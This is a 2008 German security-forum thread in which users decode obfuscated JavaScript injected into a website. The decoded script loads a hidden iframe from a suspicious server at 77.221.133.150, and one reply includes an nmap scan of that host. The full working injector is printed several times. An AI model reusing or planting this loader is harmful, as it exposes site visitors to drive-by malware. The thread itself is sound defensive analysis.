[HaBo]

sandro76 · 14.05.08, 07:46

Hallo,

auf eine Hompage wurde ein zusätzlicher Code hinzugefügt. Dieser wird von Kaspersky als Trojaner gemeldet. Der Code scheint aber verschlüsselt zu sein. Hat jemand eine ahnung was sich dahinter verbirgt?

Code:

<body bgcolor="#000000" text="#000000"><script>function v4823a3b974d26(v4823a3b97551d){ function v4823a3b975d15 () {var v4823a3b97650f=16; return v4823a3b97650f;} return(parseInt(v4823a3b97551d,v4823a3b975d15()));}function v4823a3b976d09(v4823a3b977500){ function v4823a3b978cdc () {return 2;} var v4823a3b977cf8='';for(v4823a3b9784f9=0; v4823a3b9784f9<v4823a3b977500.length; v4823a3b9784f9+=v4823a3b978cdc()){ v4823a3b977cf8+=(String.fromCharCode(v4823a3b974d26(v4823a3b977500.substr(v4823a3b9784f9, v4823a3b978cdc()))));}return v4823a3b977cf8;} document.write(v4823a3b976d09('3C5343524950543E77696E646F772E7374617475733D27446F6E65273B646F63756D656E742E777269746528273C696672616D65206E616D653D6136383139207372633D5C27687474703A2F2F37372E3232312E3133332E3135302F2E69662F676F2E68746D6C3F272B4D6174682E726F756E64284D6174682E72616E646F6D28292A323835393633292B27653965665C272077696474683D343739206865696768743D353937207374796C653D5C27646973706C61793A206E6F6E655C273E3C2F696672616D653E27293C2F5343524950543E'));</script>

Danke schon mal für die Hilfe

sandro

90nop · 14.05.08, 08:50

Hi,
einfach document.write mit einer sichtbaren ausgabe überschreiben. Für einen kurzen überblick reicht sogar "alert(...)"

Code:

<body bgcolor="#000000" text="#000000"><script>function v4823a3b974d26(v4823a3b97551d){ function v4823a3b975d15 () {var v4823a3b97650f=16; return v4823a3b97650f;} return(parseInt(v4823a3b97551d,v4823a3b975d15()));}function v4823a3b976d09(v4823a3b977500){ function v4823a3b978cdc () {return 2;} var v4823a3b977cf8='';for(v4823a3b9784f9=0; v4823a3b9784f9<v4823a3b977500.length; v4823a3b9784f9+=v4823a3b978cdc()){ v4823a3b977cf8+=(String.fromCharCode(v4823a3b974d26(v4823a3b977500.substr(v4823a3b9784f9, v4823a3b978cdc()))));}return v4823a3b977cf8;} alert(v4823a3b976d09('3C5343524950543E77696E646F772E7374617475733D27446F6E65273B646F63756D656E742E777269746528273C696672616D65206E616D653D6136383139207372633D5C27687474703A2F2F37372E3232312E3133332E3135302F2E69662F676F2E68746D6C3F272B4D6174682E726F756E64284D6174682E72616E646F6D28292A323835393633292B27653965665C272077696474683D343739206865696768743D353937207374796C653D5C27646973706C61793A206E6F6E655C273E3C2F696672616D653E27293C2F5343524950543E'));</script>

speichern als *.html und schon sieht man den code:

Code:

<SCRIPT>
window.status='Done';document.write('<iframe name=a6819 src=\'http://77.221.133.150/.if/go.html?'+math.round(math.random()*285963+'e9ef\' width=479 height=597 style\'display: none\'></iframe>')
</SCRIPT>

EDIT:
Der holt sich also von hier: 'http://77.221.133.150/.if/go.html?" irgend was 1337 mässiges...
EDIT2:
nmap meint folgendes:

Zitat:

Interesting ports on 77.221.133.150.addr.datapoint.ru (77.221.133.150):
Not shown: 1713 filtered ports
PORT STATE SERVICE
21/tcp open ftp
22/tcp open ssh

irgend ein russischer server. aber ausser http/ ftp/ssh läuft da nicht viel. Und bekommt der GET Request nicht die korrekte Syntax, landet man auf Google...

mfg
90nop

Anzeige

- Anzeige -

sandro76 · 14.05.08, 09:15

Hallo 90nop,

danke für die Antwort. Wie genau sah denn dein Quelltext aus mit Document.write? Habe evtl. öffter solche Fälle und keine Ahnung wie das funktioniert mit dem "Übersetzen".

Gruß
sandro

90nop · 14.05.08, 09:26

Die Ausgabe des entschlüsselten Codes erfolgt in deinem geposteten code mit document.write. etwa so:

Code:

document.write(v4823a3b976d09('...ne menge zeichen...'))

Die Funktion

Code:

v4823a3b976d09('...')

entschlüsselt uns also den code schon. Wir müssen ihn nun nur noch sichtbar machen:

Code:

alert(v4823a3b976d09('...'))

..eben document.write durch alert ersetzten

sandro76 · 14.05.08, 09:57

Irgendwie bin ich zu blond dafür...

ich bekomme da nur eine weiße Seite.

Code:

<Script>
document.write(v4823a3b974d26(v4823a3b97551d){ function v4823a3b975d15 () {var v4823a3b97650f=16; return v4823a3b97650f;} return(parseInt(v4823a3b97551d,v4823a3b975d15()));}function v4823a3b976d09(v4823a3b977500){ function v4823a3b978cdc () {return 2;} var v4823a3b977cf8='';for(v4823a3b9784f9=0; v4823a3b9784f9<v4823a3b977500.length; v4823a3b9784f9+=v4823a3b978cdc()){ v4823a3b977cf8+=(String.fromCharCode(v4823a3b974d26(v4823a3b977500.substr(v4823a3b9784f9, v4823a3b978cdc()))));}return v4823a3b977cf8;} document.write(v4823a3b976d09('3C5343524950543E77696E646F772E7374617475733D27446F6E65273B646F63756D656E742E777269746528273C696672616D65206E616D653D6136383139207372633D5C27687474703A2F2F37372E3232312E3133332E3135302F2E69662F676F2E68746D6C3F272B4D6174682E726F756E64284D6174682E72616E646F6D28292A323835393633292B27653965665C272077696474683D343739206865696768743D353937207374796C653D5C27646973706C61793A206E6F6E655C273E3C2F696672616D653E27293C2F5343524950543E')))

alert(v4823a3b974d26(v4823a3b97551d){ function v4823a3b975d15 () {var v4823a3b97650f=16; return v4823a3b97650f;} return(parseInt(v4823a3b97551d,v4823a3b975d15()));}function v4823a3b976d09(v4823a3b977500){ function v4823a3b978cdc () {return 2;} var v4823a3b977cf8='';for(v4823a3b9784f9=0; v4823a3b9784f9<v4823a3b977500.length; v4823a3b9784f9+=v4823a3b978cdc()){ v4823a3b977cf8+=(String.fromCharCode(v4823a3b974d26(v4823a3b977500.substr(v4823a3b9784f9, v4823a3b978cdc()))));}return v4823a3b977cf8;} document.write(v4823a3b976d09('3C5343524950543E77696E646F772E7374617475733D27446F6E65273B646F63756D656E742E777269746528273C696672616D65206E616D653D6136383139207372633D5C27687474703A2F2F37372E3232312E3133332E3135302F2E69662F676F2E68746D6C3F272B4D6174682E726F756E64284D6174682E72616E646F6D28292A323835393633292B27653965665C272077696474683D343739206865696768743D353937207374796C653D5C27646973706C61793A206E6F6E655C273E3C2F696672616D653E27293C2F5343524950543E')))
</Script>

Da schein ich was nicht verstanden zu haben, oder?

Gruß
Sandro

90nop · 14.05.08, 10:56

1. So, wie es am Ende aussehen sollte habe ich schon in meinem ersten Post gezeigt. (Erstes Code-Quote). Das must du nur noch kopieren, und als *,html speichern und dann starten.

2. K.a. wie du auf deinen obigen code kommst. Es gibt in deinem geposteten code (im Startposting) nur ein einziges "document.write(". Das ersetzt du durch "alert(" . Dann solltest du eben das hier erhalten:

Code:

<body bgcolor="#000000" text="#000000"><script>function v4823a3b974d26(v4823a3b97551d){ function v4823a3b975d15 () {var v4823a3b97650f=16; return v4823a3b97650f;} return(parseInt(v4823a3b97551d,v4823a3b975d15()));}function v4823a3b976d09(v4823a3b977500){ function v4823a3b978cdc () {return 2;} var v4823a3b977cf8='';for(v4823a3b9784f9=0; v4823a3b9784f9<v4823a3b977500.length; v4823a3b9784f9+=v4823a3b978cdc()){ v4823a3b977cf8+=(String.fromCharCode(v4823a3b974d26(v4823a3b977500.substr(v4823a3b9784f9, v4823a3b978cdc()))));}return v4823a3b977cf8;} alert(v4823a3b976d09('3C5343524950543E77696E646F772E7374617475733D27446F6E65273B646F63756D656E742E777269746528273C696672616D65206E616D653D6136383139207372633D5C27687474703A2F2F37372E3232312E3133332E3135302F2E69662F676F2E68746D6C3F272B4D6174682E726F756E64284D6174682E72616E646F6D28292A323835393633292B27653965665C272077696474683D343739206865696768743D353937207374796C653D5C27646973706C61793A206E6F6E655C273E3C2F696672616D653E27293C2F5343524950543E'));</script>

sandro76 · 14.05.08, 11:15

Ahhh,

jetzt hab sogar ich das verstanden. Mir war das vor lauter Code nicht aufgefallen das du document.write in allert getauscht hattest.
Prima, vielen dank

Gruß
sandro

Anzeige

- Anzeige -

Themen-Optionen
Druckbare Version zeigen Jemanden per E-Mail auf dieses Thema hinweisen
Ansicht
Linear-Darstellung Zur Hybrid-Darstellung wechseln Zur Baum-Darstellung wechseln

Ähnliche Themen
Thema	Autor	Forum	Antworten	Letzter Beitrag
DES Entschlüsseln?	Grayson	Cryptography & Encryption	1	04.06.05 15:17
jpg entschlüsseln	Sino	Windows	6	30.12.04 16:14
SSL entschlüsseln	Sneaker	Cryptography & Encryption	2	16.02.04 16:40
Entschlüsseln	Frankiemuniz	Cryptography & Encryption	8	20.03.03 21:25

14.05.08, 09:15	#3 (permalink)
sandro76 Themenstarter Registriert seit: 14.05.08 Likes: 0	Hallo 90nop, danke für die Antwort. Wie genau sah denn dein Quelltext aus mit Document.write? Habe evtl. öffter solche Fälle und keine Ahnung wie das funktioniert mit dem "Übersetzen". Gruß sandro

14.05.08, 09:26	#4 (permalink)
90nop Registriert seit: 07.03.08 Likes: 0	Die Ausgabe des entschlüsselten Codes erfolgt in deinem geposteten code mit document.write. etwa so: Code: document.write(v4823a3b976d09('...ne menge zeichen...')) Die Funktion Code: v4823a3b976d09('...') entschlüsselt uns also den code schon. Wir müssen ihn nun nur noch sichtbar machen: Code: alert(v4823a3b976d09('...')) ..eben document.write durch alert ersetzten

14.05.08, 11:15	#7 (permalink)
sandro76 Themenstarter Registriert seit: 14.05.08 Likes: 0	Ahhh, jetzt hab sogar ich das verstanden. Mir war das vor lauter Code nicht aufgefallen das du document.write in allert getauscht hattest. Prima, vielen dank Gruß sandro

[HaBo]

Script entschlüsseln